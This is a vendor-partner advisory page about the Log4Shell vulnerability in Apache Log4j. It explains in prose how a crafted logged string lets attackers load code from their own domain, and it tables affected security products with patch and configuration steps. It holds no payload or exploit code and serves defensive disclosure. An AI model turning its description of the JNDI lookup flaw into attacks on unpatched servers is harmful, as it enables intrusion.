Call Us
Log4Shell is a 0-day vulnerability with Critical Impact
Last Thursday, a new zero-day vulnerability, called Log4Shell, was detected in Log4j which is a Java logging framework broadly used in enterprise environments to record events and messages generated by software applications. According to security researchers the vulnerability has been under attack for at least more than a week prior to its public disclosure. Update: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. How does CVE-2021-44228 work? The flaw concerns a case of remote code execution in Log4j. All that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.
List of affected software
Inter Engineering contacted our software partners to find out if their solutions are in any way affected by the Log4Shell vulnerability. Here is the list. If you have questions or you are unsure whether your version is affected send us a message.
Vendor | Product Name | Mitigation actions |
---|---|---|
Clearswift | SEG (versions 5.3.0 & 5.4.0) SXG (versions 5.3.0 & 5.4.0) SIG (version 5.4.0) |
Clearswift released version 5.4.1 that replaces the vulnerable version of Apache Log4j. |
Cryoserver | Cryoserver Email Archiving | Not affected by CVE-2021-44228 |
F-Secure | Policy Manager (all versions) |
A deployable fix for this vulnerability was created. Follow the steps below.
After the service restarts, the patch will automatically take effect. Note: This patch only applies to version 14 and version 15 of the affected software. It will also apply to version 13, even though this version is out of support. Policy Manager is not affected by CVE-2021-45046. |
Other F-Secure solutions | Not affected by CVE-2021-44228 or CVE-2021-45046 | |
HelpSystems | GoAnywhere MFT version 5.7.0 or later GoAnywhere Gateway version 2.7.0 or later GoAnywhere MFT Agents 1.4.2 or later |
GoAnywhere will issue updates to mitigate risks from both vulnerabilities (CVE-2021-44228 and CVE-2021-45046). The updates will be made available through my.goanywhere.com. Until then the administrators can mitigate risks imposed by CVE-2021-44228 with the following actions. GoAnywhere MFT (all affected versions) & GoAnywhere Gateway (versiions greater than or equal to 2.8.2) GoAnywhere Agents (all affected versions) Edit <INSTALL_DIR>/config/system.properties and add the following string: log4j2.formatMsgNoLookups=true Then restart the GoAnywhere service GoAnywhere Gateway (versions between 2.7.0 and 2.8.2) Edit (or create if it does not exist) <INSTALL_DIR>/gagateway.vmoptions and add the following string: -Dlog4j2.formatMsgNoLookups=true Edit (or create if it does not exist) <INSTALL_DIR>/bin/gagatewayd.vmoptions and add the following string: -Dlog4j2.formatMsgNoLookups=true Restart the gateway application For more information go to GoAnywhere page for the Log4Shell vulnearbility. |
One Identity | Safeguard for Privileged Sessions (version 6.x) | Disable Safeguard Analytics functionality. This is the only component of Safeguard for Privileged Session that is impacted. |
OneSpan | Authentication Server (all versions) Virtual Appliance Authentication Server (all versions) |
OneSpan is working on releasing a hotfix. In the meantime we recommend limiting access to product components (e.g., web administration components, APIs) as much as possible. If the product is accessible publicly, additional actions are required:
These products are not affected by CVE-2021-45046. |
Stormshield | UTM Appliance (all versions) | Not affected by CVE-2021-44228 or CVE-2021-45046 |
Wallix | Access Manager (all versions) |
In order to mitigate vulnerability CVE-2021-44228 please contact us to receive the patch files. Then follow the procedure below : 1) Access Manager application installed on Linux - Transfer the log4j-core-2.8.2.jar file in attachment to the server - Locate the file log4j-core-2.8.2.jar on the server, by default it is in the Access Manager directory in /opt/wallix/wabam/lib - Make a backup of the file cp log4j-core-2.8.2.jar log4j-core-2.8.2.jar.bak - Replace log4j-core-2.8.2.jar file by the one you retrieved from the KB cp ./log4j-core-2.8.2.jar log4j-core-2.8.2.jar /opt/wallix/wabam/lib/log4j-core-2.8.2.jar - Verify the hash of the copied file with the .sha256sum you downloaded before sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar - Restart Access Manager service systemctl restart wabam
2) Access Manager application installed on Windows - Transfer the log4j-core-2.8.2.jar file in attachment to the server - Locate the file log4j-core-2.8.2.jar on the server, by default it is in the Access Manager directory in C:\Program Files\WALLIX\wabam\lib - Make a backup of the file - Replace log4j-core-2.8.2.jar file by the one you retrieved from the KB - From a powershell console, verify the hash of the copied file with the .sha256sum you downloaded before Get-FileHash 'C:\Program Files\WALLIX\wabam\lib\log4j-core-2.8.2.jar' - Restart the wabam / WALLIX Access Manager service
3) Access Manager as an appliance - Transfer the log4j-core-2.8.2.jar file in attachment to the server in /home/wabadmin - Connect to the appliance as wabadmin and go root super sudo -i - Following commands need to be entered as is - Make a backup of the current file docker cp access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar /home/wabadmin/log4j-core-2.8.2.jar.bak - Replace the file with the one you retrieved from the KB docker cp /home/wabadmin/log4j-core-2.8.2.jar access-manager_access_manager_1:/opt/wallix/wabam/lib/log4j-core-2.8.2.jar - Verify the hash of the copied file with the .sha256sum you downloaded before docker exec access-manager_access_manager_1 /usr/bin/sha256sum /opt/wallix/wabam/lib/log4j-core-2.8.2.jar - Restart Access Manager service docker restart access-manager_access_manager_1
|
Bastion (all versions) | Not affected by CVE-2021-44228 or CVE-2021-45046 |
Public Sources
How attackers are trying to exploit Log4Shell
What you need to know about the Log4J vulnerability rocking the internet
Log4Shell Security Alert: Stormshield’s product response
CISA Apache Log4j Vulnerability Guidance